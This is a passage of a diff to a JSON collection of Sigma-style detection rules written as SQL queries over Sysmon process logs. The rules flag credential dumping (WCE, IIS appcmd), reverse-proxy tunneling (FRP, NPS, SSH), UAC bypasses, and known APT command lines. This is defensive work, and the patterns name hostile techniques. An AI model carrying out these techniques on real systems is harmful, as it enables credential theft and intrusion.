LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' 